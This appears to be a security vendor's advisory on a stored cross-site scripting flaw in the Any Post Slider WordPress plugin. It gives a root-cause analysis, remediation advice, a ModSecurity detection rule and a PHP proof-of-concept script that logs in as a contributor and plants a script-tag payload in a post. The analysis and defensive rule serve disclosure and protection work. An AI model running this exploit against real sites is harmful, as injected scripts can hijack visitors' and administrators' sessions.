Atomic Edge analysis of CVE-2026-1899 (metadata-based):
This vulnerability is an authenticated Stored Cross-Site Scripting (XSS) flaw in the Any Post Slider WordPress plugin, affecting versions up to and including 1.0.4. The vulnerability resides in the plugin’s ‘aps_slider’ shortcode handler, specifically in its processing of the ‘post_type’ attribute. Attackers with Contributor-level permissions or higher can inject malicious scripts into posts or pages, which execute when a user views the compromised content. The CVSS score of 6.4 reflects a medium-severity issue with scope change and integrity impact.
Atomic Edge research infers the root cause is insufficient input sanitization and output escaping. The CWE-79 classification indicates the plugin fails to properly neutralize user-controlled input before it is placed into web page output. The vulnerability description confirms the ‘post_type’ shortcode attribute is the injection vector. Without code for review, this conclusion is based on the CWE and the typical pattern where WordPress shortcode attributes are directly echoed without using escaping functions like esc_attr().
The exploitation method involves an authenticated user with at least Contributor privileges editing a post or page. The attacker inserts the vulnerable shortcode with a malicious JavaScript payload in the ‘post_type’ attribute. For example: [aps_slider post_type=”alert(document.domain)”] When the post is saved and later viewed by any user, the script executes in the victim’s browser. The attack is stored, meaning the payload persists in the database.
Remediation requires implementing proper output escaping. The fix should use WordPress core escaping functions like esc_attr() when outputting the ‘post_type’ attribute value within HTML context. Additionally, input validation could restrict the ‘post_type’ value to a known safe list of valid WordPress post types, though output escaping remains the primary defense. The patched version would apply these sanitization and escaping functions to the shortcode handler’s rendering logic.
Successful exploitation allows attackers to perform actions within the context of a victim’s session. This can lead to session hijacking, administrative actions if an administrator views the page, content defacement, or theft of sensitive information like cookies. The scope change (S:C) in the CVSS vector indicates the impact can extend beyond the plugin’s own security scope to affect other components of the WordPress site.
Here you will find our ModSecurity compatible rule to protect against this particular CVE.
# Atomic Edge WAF Rule - CVE-2026-1899 (metadata-based)
# This rule targets the insertion of the malicious 'post_type' attribute in the shortcode via post content.
# It matches requests to the WordPress post creation/update endpoint that contain the plugin's shortcode with a script tag in the 'post_type' attribute.
SecRule REQUEST_URI "@rx /wp-admin/post.php$"
"id:1899101,phase:2,deny,status:403,chain,msg:'CVE-2026-1899: Any Post Slider Stored XSS via post_type Shortcode Attribute',severity:'CRITICAL',tag:'CVE-2026-1899',tag:'WordPress',tag:'Plugin:any-post-slider',tag:'Attack/XSS'"
SecRule REQUEST_METHOD "@streq POST" "chain"
SecRule ARGS_POST:content "@rx \[aps_slider[^\]]*post_type\s*=\s*['"]?[^'"]*?[<>\(\[].*?script"
"t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,ctl:auditLogParts=+E"
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-1899 - Any Post Slider <= 1.0.4 - Authenticated (Contributor+) Stored Cross-Site Scripting via 'post_type' Shortcode Attribute
<?php
/**
* Proof-of-Concept for CVE-2026-1899.
* Assumptions: The target site has the vulnerable plugin (<=1.0.4) installed.
* The attacker has valid Contributor-level credentials.
* The exploit creates a new post containing the malicious shortcode.
*/
$target_url = 'http://vulnerable-wordpress-site.local'; // CONFIGURE THIS
$username = 'contributor_user'; // CONFIGURE THIS
$password = 'contributor_pass'; // CONFIGURE THIS
// Payload: Basic XSS to demonstrate execution.
$malicious_post_type = '"><script>alert(`Atomic Edge XSS: ${document.domain}`)</script>';
$shortcode = '[aps_slider post_type="' . $malicious_post_type . '"]';
// Step 1: Authenticate to WordPress and obtain nonce for post creation.
$login_url = $target_url . '/wp-login.php';
$admin_ajax_url = $target_url . '/wp-admin/admin-ajax.php';
$ch = curl_init();
curl_setopt_array($ch, [
CURLOPT_URL => $login_url,
CURLOPT_POST => true,
CURLOPT_POSTFIELDS => http_build_query([
'log' => $username,
'pwd' => $password,
'wp-submit' => 'Log In',
'redirect_to' => $target_url . '/wp-admin/',
'testcookie' => '1'
]),
CURLOPT_COOKIEJAR => 'cookies.txt',
CURLOPT_RETURNTRANSFER => true,
CURLOPT_FOLLOWLOCATION => true,
]);
$response = curl_exec($ch);
// Step 2: Fetch a nonce for the 'new-post' action. This is a common WordPress pattern.
// The exact nonce parameter may vary; we assume the standard '_wpnonce' for the post editor.
// In a real scenario, the attacker would parse the editor page for a fresh nonce.
// This PoC uses a placeholder; a full implementation would require page scraping.
$editor_url = $target_url . '/wp-admin/post-new.php';
curl_setopt_array($ch, [
CURLOPT_URL => $editor_url,
CURLOPT_HTTPGET => true,
CURLOPT_COOKIEFILE => 'cookies.txt',
]);
$editor_page = curl_exec($ch);
// Extract a nonce from the page (simplified pattern).
$nonce = '';
if (preg_match('/name="_wpnonce" value="([a-f0-9]+)"/', $editor_page, $matches)) {
$nonce = $matches[1];
}
// Step 3: Create a new post with the malicious shortcode.
$create_post_url = $target_url . '/wp-admin/post.php';
$post_data = [
'post_title' => 'Atomic Edge Test Post - CVE-2026-1899',
'content' => 'This post contains an exploited shortcode. ' . $shortcode,
'post_status' => 'publish', // Contributor can publish? Usually 'pending'. Using 'draft' for safety.
'post_status' => 'draft',
'_wpnonce' => $nonce,
'_wp_http_referer' => $editor_url,
'action' => 'editpost',
'post_type' => 'post',
'user_ID' => 2, // This would be dynamically obtained.
'publish' => 'Save Draft'
];
curl_setopt_array($ch, [
CURLOPT_URL => $create_post_url,
CURLOPT_POST => true,
CURLOPT_POSTFIELDS => http_build_query($post_data),
]);
$result = curl_exec($ch);
// Check for success indicators.
if (strpos($result, 'Post draft updated.') !== false || strpos($result, 'Post published.') !== false) {
echo "[+] Exploit likely successful. Post created with malicious shortcode.n";
echo "[+] Visit the draft/post to trigger the XSS.n";
} else {
echo "[-] Post creation may have failed. Check credentials, nonce, or permissions.n";
}
curl_close($ch);
unlink('cookies.txt');
?>
